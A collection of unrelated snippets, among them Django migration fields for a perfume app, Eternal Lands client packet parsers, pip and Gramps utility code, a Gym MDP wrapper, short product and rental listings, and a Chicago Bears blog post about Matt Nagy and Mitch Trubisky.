'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'notes.classification': {
'Meta': {'object_name': 'Classification'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'notes.currency': {
'Meta': {'object_name': 'Currency'},
'country': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '10'})
},
u'notes.house': {
'Meta': {'object_name': 'House'},
'abbrev_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'bio_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'founded': ('django.db.models.fields.DateField', [], {}),
'founder': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'national_origin': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'notes.likeditem': {
'Meta': {'object_name': 'LikedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'liked_by': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {})
},
u'notes.note': {
'Meta': {'object_name': 'Note'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'notes': ('django.db.models.fields.TextField', [], {}),
'resource': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'notes.parfum': {
'Meta': {'object_name': 'Parfum'},
'classification': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['notes.Classification']", 'symmetrical': 'False'}),
'house': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'parfums'", 'to': u"orm['notes.House']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'notes_base': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'base_notes'", 'symmetrical': 'False', 'to': u"orm['notes.Note']"}),
'notes_heart': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'heart_notes'", 'symmetrical': 'False', 'to': u"orm['notes.Note']"}),
'notes_top': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'top_notes'", 'symmetrical': 'False', 'to': u"orm['notes.Note']"}),
'perfumer': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'parfums'", 'blank': 'True', 'to': u"orm['notes.Perfumer']"})
},
u'notes.parfumsizes': {
'Meta': {'object_name': 'ParfumSizes'},
'currency': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parfum': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'parfum_sizes'", 'symmetrical': 'False', 'to': u"orm['notes.Parfum']"}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '8', 'decimal_places': '2'}),
'size_ml': ('django.db.models.fields.DecimalField', [], {'max_digits': '4', 'decimal_places': '2'})
},
u'notes.perfumer': {
'Meta': {'object_name': 'Perfumer'},
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'notes.review': {
'Meta': {'object_name': 'Review'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'item': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'reviews'", 'to': u"orm['notes.Parfum']"}),
'review': ('django.db.models.fields.TextField', [], {}),
'reviewed_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'reviews'", 'to': u"orm['auth.User']"})
},
u'notes.split': {
'Meta': {'object_name': 'Split'},
'bottle': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'decanted'", 'to': u"orm['notes.Parfum']"}),
'bottle_price': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'decanted'", 'to': u"orm['notes.ParfumSizes']"}),
'host': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'host'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'split_size': ('django.db.models.fields.DecimalField', [], {'max_digits': '8', 'decimal_places': '2'}),
'splits': ('django.db.models.fields.PositiveIntegerField', [], {})
},
u'notes.splittrans': {
'Meta': {'object_name': 'SplitTrans'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'split': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'client'", 'to': u"orm['notes.Split']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
}
}
complete_apps = ['notes']
|
Beachloft 1-B Condominium in Ocean City is a holiday home with 1 room.
Situated in Ocean City, just 3.4 km from Roland E. Powell Convention Center & Visitors Info Center, Beachloft 1-B Condominium offers accommodation with free WiFi. Guests staying at this apartment have access to a balcony. The apartment includes 1 bedroom and a living room with a TV and a DVD player. There is a seating area and a kitchen complete with a dishwasher, an oven and a microwave. Northside Park is 5 km from the apartment, while Northside Park is 6 km away. The nearest airport is Salisbu...ry-Ocean City Wicomico Regional Airport, 48 km from Beachloft 1-B Condominium.
Situated in Ocean City, just 3.4 km from Roland E. Powell Convention Center & Visitors Info Center, Beachloft 1-B Condominium offers accommodation wit...h free WiFi. Guests staying at this apartment have access to a balcony. The apartment includes 1 bedroom and a living room with a TV and a DVD player. There is a seating area and a kitchen complete with a dishwasher, an oven and a microwave. Northside Park is 5 km from the apartment, while Northside Park is 6 km away. The nearest airport is Salisbury-Ocean City Wicomico Regional Airport, 48 km from Beachloft 1-B Condominium.
When would you like to stay at Beachloft 1-B Condominium?
Guests are required to show a photo identification and credit card upon check-in. Please note that all Special Requests are subject to availability and additional charges may apply. Please inform Beachloft 1-B Condominium in advance of your expected arrival time. You can use the Special Requests box when booking, or contact the property directly with the contact details provided in your confirmation. Guests under the age of 25 can only check in with a parent or official guardian who is also staying in the unit. Please note if the reservation is canceled, the total amount plus all fees ,including the service charge and taxes, are non refundable.
|
# Copyright 2008 Alex Collins
#
# This file is part of Pyela.
#
# Pyela is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyela is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Pyela. If not, see <http://www.gnu.org/licenses/>.
"""Numerous objects for parsing the messages (raw bytes) from a server
into their relevant format for use with the rest of the API.
The MessageParser base class defines common functionality for using these
objects without prior knowledge of the instance at runtime.
"""
import logging
import struct
import time
from pyela.el.common.actors import ELActor
from pyela.el.util.strings import strip_chars, split_str, is_colour, el_colour_to_rgb, bytes_find, bytes_rfind
from pyela.el.net.packets import ELPacket
from pyela.el.net.elconstants import ELNetFromServer, ELNetToServer, ELConstants
from pyela.el.net.channel import Channel
from pyela.el.logic.eventmanagers import ELSimpleEventManager
from pyela.el.logic.events import ELEventType, ELEvent
log = logging.getLogger('pyela.el.net.parsers')
em = ELSimpleEventManager()
class MessageParser(object):
"""A message received from the Eternal Lands server"""
def __init__(self, connection):
"""The connection should be an instance of ELConnection"""
self.connection = connection
def parse(self, packet):
"""Parse the given packet and return a list of Event
instances (or derivatives) (if any)
"""
pass
class ELRawTextMessageParser(MessageParser):
"""Parses RAW_TEXT messages"""
def parse(self, packet):
event = ELEvent(ELEventType(ELNetFromServer.RAW_TEXT))
event.data = {}
event.data['connection'] = self.connection #The connection the message origins from
event.data['channel'] = packet.data[0] # The channel of the message
event.data['text'] = strip_chars(packet.data[1:]) # The stripped text of the message, no colour codes, special characters translated to utf8
event.data['raw'] = packet.data[1:] # The raw text including colour codes and untranslated special characters
return [event]
class ELAddActorMessageParser(MessageParser):
def parse(self, packet):
"""Parse an ADD_NEW_(ENHANCED)_ACTOR message"""
if log.isEnabledFor(logging.DEBUG): log.debug("New actor: %s" % packet)
actor = ELActor()
actor.id, actor.x_pos, actor.y_pos, actor.z_pos, \
actor.z_rot, actor.type, frame, actor.max_health, \
actor.cur_health, actor.kind_of_actor \
= struct.unpack('<HHHHHBBHHB', packet.data[:17])
events = []
#Remove the buffs from the x/y coordinates
actor.x_pos = actor.x_pos & 0x7FF
actor.y_pos = actor.y_pos & 0x7FF
if packet.type == ELNetFromServer.ADD_NEW_ENHANCED_ACTOR:
actor.name = packet.data[28:]
frame = packet.data[22] #For some reason, data[11] is unused in the ENHANCED message
actor.kind_of_actor = packet.data[27]
else:
actor.name = packet.data[17:]
#The end of name is a \0, and there _might_ be two OR three more bytes
# containing actor-scale info.
name_end = bytes_find(actor.name, 0)
if name_end < len(actor.name)-2:
#There are two OR three more bytes after the name,
# the actor scaling bytes and possibly the attachment type
unpacked = struct.unpack('<H', actor.name[name_end+1:name_end+3])
actor.scale = unpacked[0]
#actor.scale = float(scale)/ELConstants.ACTOR_SCALE_BASE
if len(actor.name) > name_end+3:
pass
#TODO: The actor class has no attachment_type member (yet)
# The below code is tested and extracts the correct information
#actor.attachment_type = struct.unpack('B', actor.name[name_end+3])[0]
#if actor.attachment_type > 0 and actor.attachment_type < 255:
# ##ON A HORSE!!
#else:
# actor.attachment_type = 0 # The server sends either 255 or 0 if we're not on a horse
actor.name = actor.name[:name_end]
else:
actor.scale = 1
actor.name = actor.name[:-1]
#Find the actor's name's colour char
i = 0
while i < len(actor.name) and is_colour(actor.name[i]):
actor.name_colour = el_colour_to_rgb(actor.name[i])
i += 1
if actor.name_colour[0] == -1:
#We didn't find any colour codes, use kind_of_actor
if actor.kind_of_actor == ELConstants.NPC:
#NPC, bluish
#The official client colour is (0.3, 0.8, 1.0), but it's too green to see on the minimap
actor.name_colour = (0.0, 0.0, 1.0)
elif actor.kind_of_actor in (ELConstants.HUMAN, ELConstants.COMPUTER_CONTROLLED_HUMAN):
#Regular player, white
actor.name_colour = (1.0, 1.0, 1.0)
elif packet.type == ELNetFromServer.ADD_NEW_ENHANCED_ACTOR and actor.kind_of_actor in (ELConstants.PKABLE_HUMAN, ELConstants.PKABLE_COMPUTER_CONTROLLED):
#PKable player, red
actor.name_colour = (1.0, 0.0, 0.0)
else:
#Animal, yellow
actor.name_colour = (1.0, 1.0, 0.0)
space = bytes_rfind(actor.name, ord(' '))
if space != -1 and space > 0 and space+1 < len(actor.name) and is_colour(actor.name[space+1]):
actor.name = strip_chars(actor.name)
if log.isEnabledFor(logging.DEBUG): log.debug("Actor has a guild. Parsing from '%s'" % actor.name)
# split the name into playername and guild
tokens = actor.name.rsplit(' ', 1)
actor.name = tokens[0]
actor.guild = tokens[1]
else:
actor.name = strip_chars(actor.name)
#Deal with the current frame of the actor
if frame in (ELConstants.FRAME_DIE1, ELConstants.FRAME_DIE2):
actor.dead = True
elif frame in (ELConstants.FRAME_COMBAT_IDLE, ELConstants.FRAME_IN_COMBAT):
actor.fighting = True
elif frame >= ELConstants.FRAME_ATTACK_UP_1 and frame <= ELConstants.FRAME_ATTACK_UP_10:
actor.fighting = True
elif frame in (ELConstants.PAIN1, ELConstants.PAIN2):
actor.fighting = True
self.connection.session.actors[actor.id] = actor
event = ELEvent(ELEventType(ELNetFromServer.ADD_NEW_ACTOR))
event.data = actor #TODO: add connection to event data
events.append(event)
if actor.id == self.connection.session.own_actor_id:
self.connection.session.own_actor = actor
event = ELEvent(ELEventType(ELNetFromServer.YOU_ARE))
event.data = actor #TODO: add connection to event data
events.append(event)
if log.isEnabledFor(logging.DEBUG): log.debug("Actor parsed: %s, %s, %s, %s, %s, %s, %s, %s, %s, %s" % (actor.id, actor.x_pos, actor.y_pos, actor.z_pos, \
actor.z_rot, actor.type, actor.max_health, \
actor.cur_health, actor.kind_of_actor, actor.name))
return events
class ELRemoveActorMessageParser(MessageParser):
def _get_ids(data):
offset = 0
while offset < len(data):
yield struct.unpack_from('<H', data, offset)[0]
offset += 2
_get_ids = staticmethod(_get_ids)
def parse(self, packet):
"""Remove actor packet. Remove from self.connection.session.actors dict"""
if log.isEnabledFor(logging.DEBUG): log.debug("Remove actor packet: '%s'" % packet.data)
if log.isEnabledFor(logging.DEBUG): log.debug("Actors: %s" % self.connection.session.actors)
for actor_id in self._get_ids(packet.data):
event = ELEvent(ELEventType(ELNetFromServer.REMOVE_ACTOR))
event.data = {}
event.data['connection'] = self.connection
event.data['id'] = actor_id
event.data['actor'] = self.connection.session.actors[actor_id]
if actor_id in self.connection.session.actors:
del self.connection.session.actors[actor_id]
if actor_id == self.connection.session.own_actor_id:
self.connection.session.own_actor_id = -1
self.connection.session.own_actor = None
return [event]
class ELRemoveAllActorsParser(MessageParser):
def parse(self, packet):
event = ELEvent(ELEventType(ELNetFromServer.KILL_ALL_ACTORS))
event.data = {'connection': self.connection} # The full actors list can be added to the event data if it's required
self.connection.session.actors = {}
if log.isEnabledFor(logging.DEBUG): log.debug("Remove all actors packet")
return [event]
class ELAddActorCommandParser(MessageParser):
def _get_commands(data):
offset = 0
while offset < len(data):
yield struct.unpack_from('<HB', data, offset)
offset += 3
_get_commands = staticmethod(_get_commands)
def parse(self, packet):
events = []
if log.isEnabledFor(logging.DEBUG): log.debug("Actor command packet: '%s'" % packet.data)
for actor_id, command in self._get_commands(packet.data):
if actor_id in self.connection.session.actors:
self.connection.session.actors[actor_id].handle_command(command)
event = ELEvent(ELEventType(ELNetFromServer.ADD_ACTOR_COMMAND))
event.data = {'actor': self.connection.session.actors[actor_id], 'command': command, 'connection': self.connection}
events.append(event)
else:
#The actor could not be found. Something strange has happened.
#Request a new list of nearby actors from the server (resync).
#TODO: Log?
self.connection.send(ELPacket(ELNetToServer.SEND_ME_MY_ACTORS, None))
return events
class ELYouAreParser(MessageParser):
    """Parses the YOU_ARE message, which tells the client which actor
    belongs to the player."""

    def parse(self, packet):
        """Record our own actor id and, if the actor is known, emit YOU_ARE."""
        if log.isEnabledFor(logging.DEBUG):
            log.debug("YouAre packet: '%s'" % packet.data)
        # Payload is a single little-endian unsigned short: our actor id.
        # (Renamed from `id` to avoid shadowing the builtin.)
        own_id = struct.unpack('<H', packet.data)[0]
        self.connection.session.own_actor_id = own_id
        if own_id in self.connection.session.actors:
            self.connection.session.own_actor = self.connection.session.actors[own_id]
            event = ELEvent(ELEventType(ELNetFromServer.YOU_ARE))
            event.data = self.connection.session.own_actor  # TODO: Add connection to event.data
            return [event]
        return []
class ELGetActiveChannelsMessageParser(MessageParser):
    """Parse the GET_ACTIVE_CHANNELS message.

    Rebuilds the session's chat-channel list from the packet payload and
    emits a GET_ACTIVE_CHANNELS event so listeners can react to the change.
    """
    def parse(self, packet):
        # Clear the old channel list in place (callers may hold a reference).
        del self.connection.session.channels[:]
        #Message structure: Active channel (1, 2 or 3), channel 1, channel 2, channel 3
        # NOTE(review): '<BIIII' actually unpacks FOUR channel ids, and `i`
        # counts from 0 while the comment above says the active index is
        # 1-3 -- possible field-count / off-by-one mismatch; confirm against
        # the server protocol before changing anything.
        chans = struct.unpack('<BIIII', packet.data)
        i = 0
        active = chans[0]
        for c in chans[1:]:
            if c != 0:
                # A zero channel id means the slot is unused; skip it.
                self.connection.session.channels.append(Channel(self.connection, c, i == active))
            i += 1
        #Event to notify about the change in the channel list
        event = ELEvent(ELEventType(ELNetFromServer.GET_ACTIVE_CHANNELS))
        event.data = {'connection': self.connection, 'channels': self.connection.session.channels}
        return [event]
class ELBuddyEventMessageParser(MessageParser):
    """Parse the BUDDY_EVENT message (a buddy went online or offline)."""
    def parse(self, packet):
        change = packet.data[0]# 1 is online, 0 offline
        event = ELEvent(ELEventType(ELNetFromServer.BUDDY_EVENT))
        event.data = {}
        if change == 1:
            #Buddy came online
            # NOTE(review): the online branch skips TWO leading bytes while
            # the offline branch skips one -- presumably an extra protocol
            # byte precedes the name on 'online'; confirm against the server
            # protocol.
            buddy = str(strip_chars(packet.data[2:]))
            self.connection.session.buddies.append(buddy)
            event.data['event'] = 'online'
        else:
            #Buddy went offline
            buddy = str(strip_chars(packet.data[1:]))
            self.connection.session.buddies.remove(buddy)
            event.data['event'] = 'offline'
        event.data['name'] = buddy
        event.data['connection'] = self.connection
        return [event]
class ELLoginFailedParser(MessageParser):
    """Parse the LOG_IN_NOT_OK message (login rejected by the server)."""
    def parse(self, packet):
        """Return a LOG_IN_NOT_OK event carrying the server's error text."""
        event = ELEvent(ELEventType(ELNetFromServer.LOG_IN_NOT_OK))
        event.data = {
            'text': strip_chars(packet.data),  # human-readable reason
            'raw': packet.data,                # untouched payload
            'connection': self.connection,
        }
        return [event]
class ELYouDontExistParser(MessageParser):
    """Parse the YOU_DONT_EXIST message (unknown account name)."""
    def parse(self, packet):
        """Return a YOU_DONT_EXIST event; the payload carries nothing of interest."""
        event = ELEvent(ELEventType(ELNetFromServer.YOU_DONT_EXIST))
        event.data = {'connection': self.connection}
        return [event]
class ELLoginOKParser(MessageParser):
    """Parse the LOG_IN_OK message (login accepted)."""
    def parse(self, packet):
        """Reset the reconnect counter and return a LOG_IN_OK event."""
        event = ELEvent(ELEventType(ELNetFromServer.LOG_IN_OK))
        event.data = {'connection': self.connection}
        # A successful login means the connection is healthy again.
        self.connection.con_tries = 0
        return [event]
class ELPingRequestParser(MessageParser):
    """Parse the PING_REQUEST message and answer it immediately.

    Does not raise an event: keep-alive pings are strictly a protocol
    feature and not something the application itself should worry about.
    """
    def parse(self, packet):
        # Echo the payload back unchanged, as the protocol requires.
        self.connection.send(ELPacket(ELNetToServer.PING_RESPONSE, packet.data))
        return []
class ELNewMinuteParser(MessageParser):
    """Parse the NEW_MINUTE message carrying the in-game clock."""
    def parse(self, packet):
        """Update the session's game time and return a NEW_MINUTE event."""
        if len(packet.data) != 2:
            # Malformed payload; expected exactly one unsigned short.
            # TODO: report/log the invalid message
            return []
        minutes = struct.unpack('<H', packet.data)[0]
        # The game day is six hours long, so wrap at 360 minutes.
        self.connection.session.game_time = minutes % 360
        event = ELEvent(ELEventType(ELNetFromServer.NEW_MINUTE))
        event.data = {
            'connection': self.connection,
            'time': self.connection.session.game_time,
        }
        return [event]
class ELChangeMapParser(MessageParser):
    """Parse the CHANGE_MAP message (player moved to a new map)."""
    def parse(self, packet):
        """Record the new map name and return a CHANGE_MAP event."""
        # The payload is the map file name exactly as sent by the server.
        self.connection.session.current_map = packet.data
        event = ELEvent(ELEventType(ELNetFromServer.CHANGE_MAP))
        event.data = {
            'connection': self.connection,
            'map': self.connection.session.current_map,
        }
        return [event]
|
Looking for Mary Nelva Ortiz Camarillo?
Are you Mary Nelva Ortiz Camarillo?
This is a placeholder page for Mary Nelva Ortiz Camarillo, which means this person is not currently on this site. We do suggest using the tools below to find Mary Nelva Ortiz Camarillo.
You are visiting the placeholder page for Mary Nelva Ortiz Camarillo. This page is here because someone used our placeholder utility to look for Mary Nelva Ortiz Camarillo. We created this page automatically in hopes Mary Nelva Ortiz Camarillo would find it. If you are not Mary Nelva Ortiz Camarillo, but are an alumnus of Fowler High School in Fowler, CA, register on this site for free now.
|
'''
GymMDPClass.py: Contains implementation for MDPs of the Gym Environments.
'''
# Python imports.
import random
import sys
import os
import random
from collections import defaultdict
# Other imports.
import gym
from simple_rl.mdp.MDPClass import MDP
from simple_rl.tasks.gym.GymStateClass import GymState
class GymMDP(MDP):
    ''' Class for Gym MDPs: wraps an OpenAI Gym environment as a simple_rl MDP. '''

    def __init__(self, env_name='CartPole-v0', render=False, render_every_n_episodes=0):
        '''
        Args:
            env_name (str)
            render (bool): If True, renders the screen every time step.
            render_every_n_episodes (int): @render must be True, then renders the screen every n episodes.
        '''
        self.render_every_n_episodes = render_every_n_episodes
        self.episode = 0
        self.env_name = env_name
        self.env = gym.make(env_name)
        self.render = render
        # Reward observed on the most recent transition. Initialised here so
        # that _reward_func cannot raise AttributeError if it is consulted
        # before the first call to _transition_func.
        self.prev_reward = 0.0
        MDP.__init__(self, range(self.env.action_space.n), self._transition_func, self._reward_func, init_state=GymState(self.env.reset()))

    def get_parameters(self):
        '''
        Returns:
            (dict) key=param_name (str) --> val=param_val (object).
        '''
        param_dict = defaultdict(int)
        param_dict["env_name"] = self.env_name
        return param_dict

    def _reward_func(self, state, action, next_state):
        '''
        Args:
            state (GymState)
            action (int)
            next_state (GymState)

        Returns
            (float): reward produced by the most recent env.step call.
        '''
        return self.prev_reward

    def _transition_func(self, state, action):
        '''
        Args:
            state (GymState)
            action (int)

        Returns
            (GymState): wraps the next observation; also caches the step
            reward for _reward_func.
        '''
        obs, reward, is_terminal, info = self.env.step(action)

        # Render only when enabled: every episode when the interval is 0,
        # otherwise only every n-th episode.
        if self.render and (self.render_every_n_episodes == 0 or self.episode % self.render_every_n_episodes == 0):
            self.env.render()

        self.prev_reward = reward
        self.next_state = GymState(obs, is_terminal=is_terminal)

        return self.next_state

    def reset(self):
        # Start a fresh episode in the underlying environment.
        self.env.reset()
        self.episode += 1

    def __str__(self):
        return "gym-" + str(self.env_name)
|
Introducing LOCKRACK, a new product that allows you to spend less time loading and unloading, and more time doing what you want to enjoy most…recreating on the water!LOCKRACK is built to last. All components are rust resistant with an anodized aluminum base. There are four different LOCKRACK systems, each one custom made to suit your water sport of choice. From surfboards of all sizes to stand up paddleboards, surf skis, fishing kayaks and canoes, the LOCKRACK is designed to facilitate single person handling, even in extreme windy conditions.
Components built by Extreme Manufacturing, an ISO 9000 quality-compliant company.
** 65cm Base is geared for leisure SUPs, while the 50cm is better for narrow race boards.
|
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2011 Jerome Rapinat
# Copyright (C) 2011 Douglas S. Blank
# Copyright (C) 2011 Benny Malengier
# Copyright (C) 2011 Tim G L Lyons
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# gen.filters.rules/_MatchesSourceConfidenceBase.py
# $Id$
#
#-------------------------------------------------------------------------
#
# Standard Python modules
#
#-------------------------------------------------------------------------
from ...const import GRAMPS_LOCALE as glocale
_ = glocale.get_translation().gettext
#-------------------------------------------------------------------------
#
# GRAMPS modules
#
#-------------------------------------------------------------------------
from . import Rule
#-------------------------------------------------------------------------
# "Confidence level"
# Sources of an attribute of an event are ignored
#-------------------------------------------------------------------------
class MatchesSourceConfidenceBase(Rule):
    """Objects with a specific confidence level on 'direct' Source references"""

    labels = ['Confidence level:']
    name = 'Object with at least one direct source >= <confidence level>'
    description = "Matches objects with at least one direct source with confidence level(s)"
    category = _('Citation/source filters')

    def apply(self, db, obj):
        """Return True when any directly-cited source meets the confidence bar."""
        required_conf = int(self.list[0])
        return any(
            db.get_citation_from_handle(handle).get_confidence_level() >= required_conf
            for handle in obj.get_citation_list()
        )
|
Tooth colored crown on front tooth.
The patient needed a crown on a front tooth. We had our lab technician come to the crown delivery appointment and match the crown color exactly to her natural teeth. This makes the crown look natural, and it blends right in with her other teeth.
|
from __future__ import absolute_import
import logging
from email.parser import FeedParser
from pip._vendor import pkg_resources
from pip._vendor.packaging import specifiers, version
from pip._internal.exceptions import NoneMetadataError
from pip._internal.utils.misc import display_path
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
if MYPY_CHECK_RUNNING:
from typing import Optional, Tuple
from email.message import Message
from pip._vendor.pkg_resources import Distribution
logger = logging.getLogger(__name__)
def check_requires_python(requires_python, version_info):
    # type: (Optional[str], Tuple[int, ...]) -> bool
    """
    Check if the given Python version matches a "Requires-Python" specifier.

    :param version_info: A 3-tuple of ints representing a Python
        major-minor-micro version to check (e.g. `sys.version_info[:3]`).

    :return: `True` if the given Python version satisfies the requirement.
        Otherwise, return `False`.

    :raises InvalidSpecifier: If `requires_python` has an invalid format.
    """
    if requires_python is None:
        # The package provides no "Requires-Python" information at all;
        # treat every interpreter as acceptable.
        return True
    candidate = version.parse('.'.join(str(part) for part in version_info))
    return candidate in specifiers.SpecifierSet(requires_python)
def get_metadata(dist):
    # type: (Distribution) -> Message
    """
    Return the parsed metadata (METADATA or PKG-INFO) of a distribution.

    :raises NoneMetadataError: if the distribution reports `has_metadata()`
        True but `get_metadata()` returns None.
    """
    metadata_name = 'METADATA'
    if (isinstance(dist, pkg_resources.DistInfoDistribution) and
            dist.has_metadata(metadata_name)):
        # Wheel-based (dist-info) installs carry a METADATA file.
        metadata = dist.get_metadata(metadata_name)
    elif dist.has_metadata('PKG-INFO'):
        # sdist/egg-based installs carry PKG-INFO instead.
        metadata_name = 'PKG-INFO'
        metadata = dist.get_metadata(metadata_name)
    else:
        logger.warning("No metadata found in %s", display_path(dist.location))
        metadata = ''

    if metadata is None:
        # feed() below would raise a confusing "NoneType" TypeError if it
        # were passed metadata=None; fail with a descriptive error instead.
        raise NoneMetadataError(dist, metadata_name)

    feed_parser = FeedParser()
    feed_parser.feed(metadata)
    return feed_parser.close()
def get_requires_python(dist):
    # type: (pkg_resources.Distribution) -> Optional[str]
    """
    Return the "Requires-Python" metadata for a distribution, or None
    if not present.
    """
    requires_python = get_metadata(dist).get('Requires-Python')
    if requires_python is None:
        return None
    # requires_python may be an email Header object; normalise to a plain
    # str so callers (and the type checker) always see a string.
    return str(requires_python)
def get_installer(dist):
    # type: (Distribution) -> str
    """Return the tool recorded as having installed `dist`, or '' if unknown.

    The installer name is the first non-blank line of the distribution's
    INSTALLER metadata file.
    """
    if not dist.has_metadata('INSTALLER'):
        return ''
    for line in dist.get_metadata_lines('INSTALLER'):
        stripped = line.strip()
        if stripped:
            return stripped
    return ''
|
Nagy-Trubisky: A Match Made in Heaven?
With Matt Nagy now the head coach of the Chicago Bears his primary goal will be to implement his offense and help develop second-year quarterback Mitch Trubisky.
Nagy, an assistant to noted “quarterback whisperer” Andy Reid, played a big part in incorporating college-style run-pass options (RPO) into the Chiefs offense this past year.
These will presumably be a sizable part of the playbook Nagy brings with him which should help his primary goal of developing Trubisky into a top-tier quarterback as he ran similar plays in college.
Let’s take a look at how Nagy will be able to set-up Trubisky for success.
A successful running game is a quarterback and offensive line’s best friend. We all saw this against the Lions the first time they played and the Bengals, two of Trubisky’s better games this season.
Nonetheless, many of us know that the Bears used a lot of heavy-run formations last year to run the ball in 13 personnel (one running back, three tight ends) or 22 personnel (a running back, a fullback, and two tight ends) into a loaded box.
Nagy was also willing to use his quarterback in the run game through zone reads. We saw this some of this last year in Chicago, but not often enough especially in short yardage situations, so this is great for Trubisky.
Prior to the draft, there were some comparisons made between Trubisky and Smith, and while I do not disagree, I think Trubisky has more arm strength and is slightly more athletic. However, Trubisky clearly has the accuracy to thrive in the quick passing West Coast offense that Nagy employs.
It is hard to tell from statistics due to the predictable nature of the Bears’ offense, but Trubisky was clearly more comfortable in the shotgun than under center. Unfortunately for the quarterback, the Bears did not tailor the offense to his strengths.
The splits below explain all you need to know.
In his first game calling plays, Nagy did a good job of mixing RPOs, quick-rhythm throws, and threw in quite a few deep shots as well. Trubisky did a good job of throwing the deep ball last season when given the opportunity, but the Bears offense was not balanced enough to give him time to sit in the pocket while the routes developed.
The Chiefs’ offense was predicated on quick throws that allowed receivers to gain yards after the catch.
Another thing Nagy did a good job of was moving the pocket with Smith, and one of the first things we all saw with Trubisky was just how deadly accurate he can be on the move.
These are all high percentage throws we know Trubisky can make.
In Nagy’s offense, getting open is more important than making contested catches. Look for Ryan Pace to add quick and agile receivers who are good route-runners to pair with Trubisky and Nagy.
While we do not know exactly what Nagy’s system will be as he was doing the play calling for Reid’s offense, it was obvious that Nagy likes getting the ball to playmakers in space.
It will be interesting to see what Nagy brings with him from Reid and what his identity as a play caller will be. It is not far-fetched to think that Nagy and Trubisky can be a match made in heaven.
I liked what I read a lot. Very good to hear that it looks to be a match made in heaven for Trubisky. Is there anything from the plays that Nagy drew up that gives you pause? For instance, weaknesses from Mitch that Nagy may struggle to cover up?
Nagy really seems to like the quick out to the left side if defenders are playing off and as far as weaknesses for Trubisky, he did have trouble with throws outside the numbers to his left side this year because his hips tend to fly open when throwing to his left. Nagy being the quarterback technician that he is though I am hopeful that he will be able to fix that specific weakness.
So do you think wide receivers like Jarvis Landry and Calvin Ridley fit the bill for quick and agile routerunners? Instead of contested ball receivers like a Courtland Sutton?
